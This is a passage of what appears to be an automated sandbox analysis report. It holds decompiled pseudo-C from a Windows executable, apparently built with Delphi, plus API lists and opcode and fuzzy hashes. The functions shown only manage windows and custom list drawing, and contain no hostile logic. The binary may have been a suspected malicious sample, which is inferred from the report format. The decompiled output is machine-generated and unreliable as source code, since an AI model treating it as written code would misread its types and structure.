                                                                        				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
                                                                        					_t294 =  *0x495c40; // 0x41d594
                                                                        					E00406548(_t294,  &_v12);
                                                                        					E0040A17C(_v12, 1);
                                                                        					E00403DA8();
                                                                        				}
                                                                        				_t149 =  *0x496c04; // 0x2150d40
                                                                        				E00456F4C(_t149);
                                                                        				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
                                                                        				_push(_t372);
                                                                        				_push(0x452ec1);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t374;
                                                                        				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                                        					_t155 = _v8;
                                                                        					_t378 =  *((char*)(_t155 + 0x1a6));
                                                                        					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                                        						_push(_t372);
                                                                        						_push(0x452dc8);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t374;
                                                                        						E004037D8(_v8, __eflags);
                                                                        						 *[fs:eax] = 0;
                                                                        						_t160 =  *0x496c08; // 0x215094c
                                                                        						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                                        						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                                        							__eflags = 0;
                                                                        							E00451B60(_v8, 0);
                                                                        						}
                                                                        						_t162 = _v8;
                                                                        						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                                        						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                                        							_t163 = _v8;
                                                                        							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
                                                                        							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
                                                                        								_t299 = 0;
                                                                        								_t165 = E0043CC2C(_v8);
                                                                        								_t166 = GetActiveWindow();
                                                                        								__eflags = _t165 - _t166;
                                                                        								if(_t165 == _t166) {
                                                                        									_t176 = IsIconic(E0043CC2C(_v8));
                                                                        									__eflags = _t176;
                                                                        									if(_t176 == 0) {
                                                                        										_t299 = E0044D7A0(E0043CC2C(_v8));
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t299;
                                                                        								if(_t299 == 0) {
                                                                        									ShowWindow(E0043CC2C(_v8), 0);
                                                                        								} else {
                                                                        									SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                        									SetActiveWindow(_t299);
                                                                        								}
                                                                        							} else {
                                                                        								SetWindowPos(E0043CC2C(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                        							}
                                                                        						} else {
                                                                        							E0043A2A8(_v8);
                                                                        						}
                                                                        					} else {
                                                                        						_push(_t372);
                                                                        						_push(0x452a2c);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t374;
                                                                        						E004037D8(_v8, _t378);
                                                                        						 *[fs:eax] = 0;
                                                                        						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                                        							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                        								_t301 = E004541A4() -  *(_v8 + 0x48);
                                                                        								__eflags = _t301;
                                                                        								_t302 = _t301 >> 1;
                                                                        								if(_t301 < 0) {
                                                                        									asm("adc ebx, 0x0");
                                                                        								}
                                                                        								_t198 = E00454198() -  *(_v8 + 0x4c);
                                                                        								__eflags = _t198;
                                                                        								_t199 = _t198 >> 1;
                                                                        								if(_t198 < 0) {
                                                                        									asm("adc eax, 0x0");
                                                                        								}
                                                                        							} else {
                                                                        								_t241 =  *0x496c04; // 0x2150d40
                                                                        								_t305 = E00435FB0( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                                        								_t302 = _t305 >> 1;
                                                                        								if(_t305 < 0) {
                                                                        									asm("adc ebx, 0x0");
                                                                        								}
                                                                        								_t245 =  *0x496c04; // 0x2150d40
                                                                        								_t248 = E00435FF4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                                        								_t199 = _t248 >> 1;
                                                                        								if(_t248 < 0) {
                                                                        									asm("adc eax, 0x0");
                                                                        								}
                                                                        							}
                                                                        							if(_t302 < 0) {
                                                                        								_t302 = 0;
                                                                        							}
                                                                        							if(_t199 < 0) {
                                                                        								_t199 = 0;
                                                                        							}
                                                                        							_t326 = _t199;
                                                                        							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                        							if( *((char*)(_v8 + 0x57)) != 0) {
                                                                        								E00450E14(_v8, _t326);
                                                                        							}
                                                                        						} else {
                                                                        							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                                        							__eflags = _t251 + 0xfa - 2;
                                                                        							if(_t251 + 0xfa - 2 >= 0) {
                                                                        								__eflags = _t251 - 5;
                                                                        								if(_t251 == 5) {
                                                                        									_t252 = _v8;
                                                                        									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                                        									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                                        										_t307 = E004541D4() -  *(_v8 + 0x48);
                                                                        										__eflags = _t307;
                                                                        										_t308 = _t307 >> 1;
                                                                        										if(_t307 < 0) {
                                                                        											asm("adc ebx, 0x0");
                                                                        										}
                                                                        										_t258 = E004541C8() -  *(_v8 + 0x4c);
                                                                        										__eflags = _t258;
                                                                        										_t259 = _t258 >> 1;
                                                                        										if(_t258 < 0) {
                                                                        											asm("adc eax, 0x0");
                                                                        										}
                                                                        									} else {
                                                                        										_t262 =  *0x496c04; // 0x2150d40
                                                                        										_t311 = E00435FB0( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                                        										__eflags = _t311;
                                                                        										_t308 = _t311 >> 1;
                                                                        										if(_t311 < 0) {
                                                                        											asm("adc ebx, 0x0");
                                                                        										}
                                                                        										_t266 =  *0x496c04; // 0x2150d40
                                                                        										_t269 = E00435FF4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                                        										__eflags = _t269;
                                                                        										_t259 = _t269 >> 1;
                                                                        										if(_t269 < 0) {
                                                                        											asm("adc eax, 0x0");
                                                                        										}
                                                                        									}
                                                                        									__eflags = _t308;
                                                                        									if(_t308 < 0) {
                                                                        										_t308 = 0;
                                                                        										__eflags = 0;
                                                                        									}
                                                                        									__eflags = _t259;
                                                                        									if(_t259 < 0) {
                                                                        										_t259 = 0;
                                                                        										__eflags = 0;
                                                                        									}
                                                                        									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                        								}
                                                                        							} else {
                                                                        								_t270 =  *0x496c04; // 0x2150d40
                                                                        								_t370 =  *(_t270 + 0x44);
                                                                        								_t271 = _v8;
                                                                        								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                                        								if( *((char*)(_t271 + 0x230)) == 7) {
                                                                        									_t362 =  *0x44c130; // 0x44c17c
                                                                        									_t290 = E00403768( *(_v8 + 4), _t362);
                                                                        									__eflags = _t290;
                                                                        									if(_t290 != 0) {
                                                                        										_t370 =  *(_v8 + 4);
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t370;
                                                                        								if(_t370 == 0) {
                                                                        									_t313 = E004541A4() -  *(_v8 + 0x48);
                                                                        									__eflags = _t313;
                                                                        									_t314 = _t313 >> 1;
                                                                        									if(_t313 < 0) {
                                                                        										asm("adc ebx, 0x0");
                                                                        									}
                                                                        									_t277 = E00454198() -  *(_v8 + 0x4c);
                                                                        									__eflags = _t277;
                                                                        									_t278 = _t277 >> 1;
                                                                        									if(_t277 < 0) {
                                                                        										asm("adc eax, 0x0");
                                                                        									}
                                                                        								} else {
                                                                        									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                                        									__eflags = _t317;
                                                                        									_t318 = _t317 >> 1;
                                                                        									if(_t317 < 0) {
                                                                        										asm("adc ebx, 0x0");
                                                                        									}
                                                                        									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                                        									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                                                        									__eflags = _t286;
                                                                        									_t287 = _t286 >> 1;
                                                                        									if(_t286 < 0) {
                                                                        										asm("adc eax, 0x0");
                                                                        									}
                                                                        									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                                        								}
                                                                        								__eflags = _t314;
                                                                        								if(_t314 < 0) {
                                                                        									_t314 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								__eflags = _t278;
                                                                        								if(_t278 < 0) {
                                                                        									_t278 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								_t328 = _t278;
                                                                        								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                        								_t281 = _v8;
                                                                        								__eflags =  *((char*)(_t281 + 0x57));
                                                                        								if( *((char*)(_t281 + 0x57)) != 0) {
                                                                        									E00450E14(_v8, _t328);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						 *((char*)(_v8 + 0x230)) = 0;
                                                                        						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                        							ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                        						} else {
                                                                        							if( *(_v8 + 0x22b) != 2) {
                                                                        								ShowWindow(E0043CC2C(_v8),  *(0x47ab74 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                        								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                                        								__eflags = _t220;
                                                                        								CallWindowProcA(0x406d84, E0043CC2C(_v8), 5, 0, _t220);
                                                                        								E0043680C();
                                                                        							} else {
                                                                        								_t231 = E0043CC2C(_v8);
                                                                        								_t232 =  *0x496c04; // 0x2150d40
                                                                        								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                                        								ShowWindow(E0043CC2C(_v8), 3);
                                                                        							}
                                                                        							_t226 =  *0x496c04; // 0x2150d40
                                                                        							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_pop(_t331);
                                                                        				 *[fs:eax] = _t331;
                                                                        				_push(0x452ec8);
                                                                        				_t154 = _v8;
                                                                        				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
                                                                        				return _t154;
                                                                        			}

                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 00452CF5
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LoadMessageSendString
                                                                        • String ID:
                                                                        • API String ID: 1946433856-0
                                                                        • Opcode ID: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction ID: d82fd93d8c37f43bf0d08f362bbfae17662a6fc41c918366e4d92ba17f68ed98
                                                                        • Opcode Fuzzy Hash: 717acc6c25fd58546519ffb373e4bf667c7c6554064bb9ea9fc5b4701ab0a2bc
                                                                        • Instruction Fuzzy Hash: C9F16130A00204EFDB01DFA9CA85B5E77F5AB09305F2540B6E904AB363D779EE45DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0046F74C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagPOINT _v20;
                                                                        				char _v21;
                                                                        				char _v22;
                                                                        				short _v24;
                                                                        				short _v26;
                                                                        				void* _v42;
                                                                        				intOrPtr _v78;
                                                                        				char _v82;
                                                                        				struct tagLOGFONTA _v142;
                                                                        				char _v148;
                                                                        				char _v156;
                                                                        				intOrPtr _t339;
                                                                        				signed int _t352;
                                                                        				signed int _t365;
                                                                        				intOrPtr _t366;
                                                                        				intOrPtr _t371;
                                                                        				signed int _t373;
                                                                        				intOrPtr _t378;
                                                                        				intOrPtr _t381;
                                                                        				intOrPtr _t382;
                                                                        				signed int _t396;
                                                                        				intOrPtr _t405;
                                                                        				intOrPtr _t407;
                                                                        				intOrPtr _t416;
                                                                        				signed int _t428;
                                                                        				signed int _t430;
                                                                        				signed int _t438;
                                                                        				signed int _t440;
                                                                        				signed int _t446;
                                                                        				signed int _t454;
                                                                        				signed int _t456;
                                                                        				signed int _t458;
                                                                        				intOrPtr _t459;
                                                                        				signed int _t461;
                                                                        				signed int _t463;
                                                                        				intOrPtr _t465;
                                                                        				signed int _t467;
                                                                        				signed int _t486;
                                                                        				signed int _t488;
                                                                        				signed int _t491;
                                                                        				signed int _t493;
                                                                        				signed int _t498;
                                                                        				intOrPtr _t504;
                                                                        				long _t506;
                                                                        				int _t508;
                                                                        				void* _t520;
                                                                        				signed int _t531;
                                                                        				void* _t548;
                                                                        				intOrPtr _t552;
                                                                        				signed int _t566;
                                                                        				signed int _t569;
                                                                        				intOrPtr _t577;
                                                                        				intOrPtr _t586;
                                                                        				intOrPtr _t589;
                                                                        				signed int _t595;
                                                                        				intOrPtr _t597;
                                                                        				signed int _t611;
                                                                        				intOrPtr _t615;
                                                                        				intOrPtr _t631;
                                                                        				intOrPtr _t632;
                                                                        				intOrPtr _t633;
                                                                        				intOrPtr _t634;
                                                                        				intOrPtr _t638;
                                                                        				intOrPtr _t639;
                                                                        				struct HWND__* _t640;
                                                                        				signed char _t647;
                                                                        				intOrPtr _t682;
                                                                        				signed int _t683;
                                                                        				signed int _t685;
                                                                        				intOrPtr _t686;
                                                                        				intOrPtr _t695;
                                                                        				intOrPtr _t699;
                                                                        				intOrPtr _t707;
                                                                        				intOrPtr _t711;
                                                                        				intOrPtr _t727;
                                                                        				signed int _t744;
                                                                        				signed int _t749;
                                                                        				intOrPtr _t762;
                                                                        				signed int _t767;
                                                                        				signed int _t772;
                                                                        				void* _t783;
                                                                        				void* _t784;
                                                                        				signed int _t789;
                                                                        				intOrPtr _t791;
                                                                        				signed int _t792;
                                                                        				signed int _t793;
                                                                        				signed int _t795;
                                                                        				signed int _t799;
                                                                        				void* _t800;
                                                                        				intOrPtr _t806;
                                                                        				void* _t815;
                                                                        				void* _t816;
                                                                        				intOrPtr _t817;
                                                                        				void* _t818;
                                                                        				void* _t819;
                                                                        
                                                                        				_t815 = _t816;
                                                                        				_t817 = _t816 + 0xffffff68;
                                                                        				_push(__ebx);
                                                                        				_v148 = 0;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t815);
                                                                        				_push(0x470174);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t817;
                                                                        				_t339 =  *((intOrPtr*)(_v12 + 8));
                                                                        				_t682 =  *((intOrPtr*)(_t339 + 8));
                                                                        				_t818 = _t682 - 0xfffffe6b;
                                                                        				if(_t818 > 0) {
                                                                        					__eflags = _t682 - 0xfffffe6f;
                                                                        					if(__eflags > 0) {
                                                                        						_t683 = _t682 - 0xfffffff4;
                                                                        						__eflags = _t683;
                                                                        						if(_t683 == 0) {
                                                                        							_t685 =  *(_v8 + 0x20c);
                                                                        							__eflags = _t685;
                                                                        							if(_t685 == 0) {
                                                                        								goto L114;
                                                                        							} else {
                                                                        								_t615 = _t339;
                                                                        								E00420398(_t685);
                                                                        								_push(_t815);
                                                                        								_push(0x46fd62);
                                                                        								_push( *[fs:edx]);
                                                                        								 *[fs:edx] = _t817;
                                                                        								 *(_v12 + 0xc) = 0;
                                                                        								__eflags =  *(_t615 + 0xe) & 0x00000001;
                                                                        								if(( *(_t615 + 0xe) & 0x00000001) != 0) {
                                                                        									E00402EF0( &_v82, 0x28);
                                                                        									_v78 =  *((intOrPtr*)(_t615 + 0x24));
                                                                        									_t789 = E0046F724(_v8,  &_v82);
                                                                        									__eflags = _t789;
                                                                        									if(_t789 != 0) {
                                                                        										_t352 =  *(_t615 + 0xc) - 0x10001;
                                                                        										__eflags = _t352;
                                                                        										if(_t352 == 0) {
                                                                        											__eflags =  *(_t615 + 0xc) & 0x00010002;
                                                                        											if(( *(_t615 + 0xc) & 0x00010002) != 0) {
                                                                        												_t416 = _v8;
                                                                        												_t707 = _v8;
                                                                        												__eflags =  *((intOrPtr*)(_t416 + 0x288)) +  *((intOrPtr*)(_t707 + 0x28c));
                                                                        												if( *((intOrPtr*)(_t416 + 0x288)) +  *((intOrPtr*)(_t707 + 0x28c)) != 0) {
                                                                        													SelectObject( *(_t615 + 0x10),  *(_v8 + 0x28c));
                                                                        													DeleteObject( *(_v8 + 0x288));
                                                                        													 *(_v8 + 0x288) = 0;
                                                                        													__eflags = 0;
                                                                        													 *(_v8 + 0x28c) = 0;
                                                                        												}
                                                                        											}
                                                                        											_push(_t815);
                                                                        											_push(0x46fcbd);
                                                                        											_push( *[fs:edx]);
                                                                        											 *[fs:edx] = _t817;
                                                                        											E004207B0( *(_v8 + 0x20c),  *(_t615 + 0x10));
                                                                        											E0042062C( *(_v8 + 0x20c));
                                                                        											E00420648( *(_v8 + 0x20c));
                                                                        											__eflags =  *(_t615 + 0x28) & 0x00000001;
                                                                        											if(( *(_t615 + 0x28) & 0x00000001) != 0) {
                                                                        												E0041F464( *((intOrPtr*)( *(_v8 + 0x20c) + 0xc)), 0x8000000e);
                                                                        												E0041FC50( *((intOrPtr*)( *(_v8 + 0x20c) + 0x14)), 0, 0x8000000d, _t789, _t815, __eflags);
                                                                        											}
                                                                        											_t365 =  *(_v8 + 0x20c);
                                                                        											_t695 =  *((intOrPtr*)(_t365 + 0xc));
                                                                        											 *((intOrPtr*)(_t695 + 0xc)) = _v8;
                                                                        											 *((intOrPtr*)(_t695 + 8)) = 0x470afc;
                                                                        											_t366 =  *((intOrPtr*)(_t365 + 0x14));
                                                                        											 *((intOrPtr*)(_t366 + 0xc)) = _v8;
                                                                        											 *((intOrPtr*)(_t366 + 8)) = 0x470afc;
                                                                        											 *((char*)(_v8 + 0x210)) = 0;
                                                                        											_t647 =  *(_t615 + 0x28);
                                                                        											_v21 =  *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 0);
                                                                        											__eflags = _v22;
                                                                        											if(_v22 == 0) {
                                                                        												_t407 = _v12;
                                                                        												_t131 = _t407 + 0xc;
                                                                        												 *_t131 =  *(_t407 + 0xc) | 0x00010000;
                                                                        												__eflags =  *_t131;
                                                                        											}
                                                                        											__eflags = _v21;
                                                                        											if(_v21 != 0) {
                                                                        												_t371 = _v8;
                                                                        												__eflags =  *((char*)(_t371 + 0x210));
                                                                        												if( *((char*)(_t371 + 0x210)) != 0) {
                                                                        													 *((char*)(_v8 + 0x210)) = 0;
                                                                        													_t799 =  *(_v8 + 0x20c);
                                                                        													_t381 =  *((intOrPtr*)(_t799 + 0xc));
                                                                        													 *((intOrPtr*)(_t381 + 8)) = 0;
                                                                        													 *((intOrPtr*)(_t381 + 0xc)) = 0;
                                                                        													_t382 =  *((intOrPtr*)(_t799 + 0x14));
                                                                        													 *((intOrPtr*)(_t382 + 8)) = 0;
                                                                        													 *((intOrPtr*)(_t382 + 0xc)) = 0;
                                                                        													_t150 = _v12 + 8; // 0x5875c984
                                                                        													_t791 =  *_t150;
                                                                        													 *((intOrPtr*)(_t791 + 0x30)) = E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_t799 + 0xc)) + 0x18)));
                                                                        													 *((intOrPtr*)(_t791 + 0x34)) = E0041EFA4(E0041FC48( *((intOrPtr*)( *(_v8 + 0x20c) + 0x14))));
                                                                        													_t396 = GetObjectA(E0041F478( *((intOrPtr*)( *(_v8 + 0x20c) + 0xc)), _t615, _t647), 0x3c,  &_v142);
                                                                        													__eflags = _t396;
                                                                        													if(_t396 != 0) {
                                                                        														E004207B0( *(_v8 + 0x20c), 0);
                                                                        														_t800 = CreateFontIndirectA( &_v142);
                                                                        														 *(_v8 + 0x288) = _t800;
                                                                        														 *(_v8 + 0x28c) = SelectObject( *(_t615 + 0x10), _t800);
                                                                        														_t405 = _v12;
                                                                        														_t171 = _t405 + 0xc;
                                                                        														 *_t171 =  *(_t405 + 0xc) | 0x00000002;
                                                                        														__eflags =  *_t171;
                                                                        													}
                                                                        												}
                                                                        											} else {
                                                                        												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000004;
                                                                        											}
                                                                        											_t373 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        											__eflags = _t373;
                                                                        											if(_t373 != 0) {
                                                                        												_t378 = _v12;
                                                                        												_t176 = _t378 + 0xc;
                                                                        												 *_t176 =  *(_t378 + 0xc) | 0x00000010;
                                                                        												__eflags =  *_t176;
                                                                        											}
                                                                        											_pop(_t699);
                                                                        											 *[fs:eax] = _t699;
                                                                        											_push(0x46fd46);
                                                                        											__eflags = 0;
                                                                        											return E004207B0( *(_v8 + 0x20c), 0);
                                                                        										} else {
                                                                        											_t428 = _t352 - 1;
                                                                        											__eflags = _t428;
                                                                        											if(_t428 == 0) {
                                                                        												_t430 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        												__eflags = _t430;
                                                                        												if(_t430 != 0) {
                                                                        													 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 1);
                                                                        												}
                                                                        											} else {
                                                                        												_t438 = _t428 - 1;
                                                                        												__eflags = _t438;
                                                                        												if(_t438 == 0) {
                                                                        													_t440 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        													__eflags = _t440;
                                                                        													if(_t440 != 0) {
                                                                        														 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 2);
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t438 == 1;
                                                                        													if(_t438 == 1) {
                                                                        														_t446 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        														__eflags = _t446;
                                                                        														if(_t446 != 0) {
                                                                        															 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 3);
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        											goto L71;
                                                                        										}
                                                                        									} else {
                                                                        										E00403E54();
                                                                        										goto L114;
                                                                        									}
                                                                        								} else {
                                                                        									 *((intOrPtr*)( *_v8 + 0x44))();
                                                                        									_t454 =  *(_t615 + 0xc) - 1;
                                                                        									__eflags = _t454;
                                                                        									if(_t454 == 0) {
                                                                        										_t456 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        										__eflags = _t456;
                                                                        										if(_t456 == 0) {
                                                                        											_t458 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        											__eflags = _t458;
                                                                        											if(_t458 != 0) {
                                                                        												L32:
                                                                        												_t459 = _v12;
                                                                        												_t43 = _t459 + 0xc;
                                                                        												 *_t43 =  *(_t459 + 0xc) | 0x00000020;
                                                                        												__eflags =  *_t43;
                                                                        											} else {
                                                                        												_t467 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        												__eflags = _t467;
                                                                        												if(_t467 != 0) {
                                                                        													goto L32;
                                                                        												}
                                                                        											}
                                                                        											_t461 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        											__eflags = _t461;
                                                                        											if(_t461 != 0) {
                                                                        												_t465 = _v12;
                                                                        												_t48 = _t465 + 0xc;
                                                                        												 *_t48 =  *(_t465 + 0xc) | 0x00000010;
                                                                        												__eflags =  *_t48;
                                                                        											}
                                                                        											_t463 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        											__eflags = _t463;
                                                                        											if(_t463 != 0) {
                                                                        												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000040;
                                                                        											}
                                                                        											goto L71;
                                                                        										} else {
                                                                        											 *[fs:eax] = _t817;
                                                                        											E004207B0( *(_v8 + 0x20c),  *(_t615 + 0x10));
                                                                        											E0042062C( *(_v8 + 0x20c));
                                                                        											E00420648( *(_v8 + 0x20c));
                                                                        											_v21 =  *((intOrPtr*)( *_v8 + 0xcc))( *[fs:eax], 0x46f915, _t815);
                                                                        											_pop(_t727);
                                                                        											 *[fs:eax] = _t727;
                                                                        											_push(0x46f91c);
                                                                        											__eflags = 0;
                                                                        											return E004207B0( *(_v8 + 0x20c), 0);
                                                                        										}
                                                                        									} else {
                                                                        										_t486 = _t454 - 1;
                                                                        										__eflags = _t486;
                                                                        										if(_t486 == 0) {
                                                                        											_t488 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        											__eflags = _t488;
                                                                        											if(_t488 != 0) {
                                                                        												 *((intOrPtr*)( *_v8 + 0xcc))();
                                                                        											}
                                                                        										} else {
                                                                        											_t491 = _t486 - 1;
                                                                        											__eflags = _t491;
                                                                        											if(_t491 == 0) {
                                                                        												_t493 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        												__eflags = _t493;
                                                                        												if(_t493 != 0) {
                                                                        													 *((intOrPtr*)( *_v8 + 0xcc))();
                                                                        												}
                                                                        											} else {
                                                                        												__eflags = _t491 == 1;
                                                                        												if(_t491 == 1) {
                                                                        													_t498 =  *((intOrPtr*)( *_v8 + 0xdc))();
                                                                        													__eflags = _t498;
                                                                        													if(_t498 != 0) {
                                                                        														 *((intOrPtr*)( *_v8 + 0xcc))();
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        										L71:
                                                                        										__eflags = 0;
                                                                        										_pop(_t711);
                                                                        										 *[fs:eax] = _t711;
                                                                        										_push(0x47015b);
                                                                        										return E00420604( *(_v8 + 0x20c));
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t683 == 7;
                                                                        							if(_t683 == 7) {
                                                                        								 *((intOrPtr*)(_v8 + 0x240)) = 0;
                                                                        								GetCursorPos( &_v20);
                                                                        								_t504 = _v8;
                                                                        								__eflags =  *((char*)(_t504 + 0x244));
                                                                        								if( *((char*)(_t504 + 0x244)) == 0) {
                                                                        									_t506 = E00407328( &_v20, 0);
                                                                        									_t508 = E0043CC2C(_v8);
                                                                        									PostMessageA(E0043CC2C(_v8), 0xbc7b, _t508, _t506);
                                                                        								} else {
                                                                        									E004360F0(_v8,  &_v156,  &_v20);
                                                                        									_v26 = E00407328( &_v156,  &_v156);
                                                                        									 *((intOrPtr*)(_v8 + 0x240)) = E0046F45C(_v8, _v24, _v26);
                                                                        									_t520 = E00407328( &_v20, _v24);
                                                                        									E00437760(_v8, E0043CC2C(_v8), 0x7b, _t520);
                                                                        									 *((intOrPtr*)(_v8 + 0x240)) = 0;
                                                                        								}
                                                                        								 *(_v12 + 0xc) = 1;
                                                                        							}
                                                                        							goto L114;
                                                                        						}
                                                                        					} else {
                                                                        						if(__eflags == 0) {
                                                                        							goto L91;
                                                                        						} else {
                                                                        							_t744 = _t682 - 0xfffffe6c;
                                                                        							__eflags = _t744;
                                                                        							if(_t744 == 0) {
                                                                        								_t631 = _t339;
                                                                        								_t792 = E0046F724(_v8, _t631 + 0xc);
                                                                        								__eflags = _t792;
                                                                        								if(_t792 != 0) {
                                                                        									__eflags =  *(_t631 + 0xc) & 0x00000001;
                                                                        									if(( *(_t631 + 0xc) & 0x00000001) != 0) {
                                                                        										E00404538( &_v148,  *((intOrPtr*)(_t631 + 0x1c)));
                                                                        										E0046CFA4(_t792, _v148);
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								_t749 = _t744 - 1;
                                                                        								__eflags = _t749;
                                                                        								if(_t749 == 0) {
                                                                        									_t632 = _t339;
                                                                        									_t793 = E0046F724(_v8, _t632 + 0xc);
                                                                        									__eflags = _t793;
                                                                        									if(_t793 != 0) {
                                                                        										__eflags =  *(_t632 + 0xc) & 0x00000001;
                                                                        										if(( *(_t632 + 0xc) & 0x00000001) != 0) {
                                                                        											_t548 = E004047F8( *((intOrPtr*)(_t793 + 8)));
                                                                        											__eflags =  *((intOrPtr*)(_t632 + 0x20)) - 1;
                                                                        											E00408C5C( *((intOrPtr*)(_t632 + 0x1c)),  *((intOrPtr*)(_t632 + 0x20)) - 1, _t548);
                                                                        										}
                                                                        										__eflags =  *(_t632 + 0xc) & 0x00000002;
                                                                        										if(( *(_t632 + 0xc) & 0x00000002) != 0) {
                                                                        											 *((intOrPtr*)( *_v8 + 0xd4))();
                                                                        											 *((intOrPtr*)(_t632 + 0x24)) =  *((intOrPtr*)(_t793 + 0x14));
                                                                        										}
                                                                        										__eflags =  *(_t632 + 0xc) & 0x00000020;
                                                                        										if(( *(_t632 + 0xc) & 0x00000020) != 0) {
                                                                        											 *((intOrPtr*)( *_v8 + 0xd8))();
                                                                        											 *((intOrPtr*)(_t632 + 0x28)) =  *((intOrPtr*)(_t793 + 0x18));
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									__eflags = _t749 == 1;
                                                                        									if(_t749 == 1) {
                                                                        										goto L93;
                                                                        									} else {
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L114;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t818 == 0) {
                                                                        						_t762 = _v8;
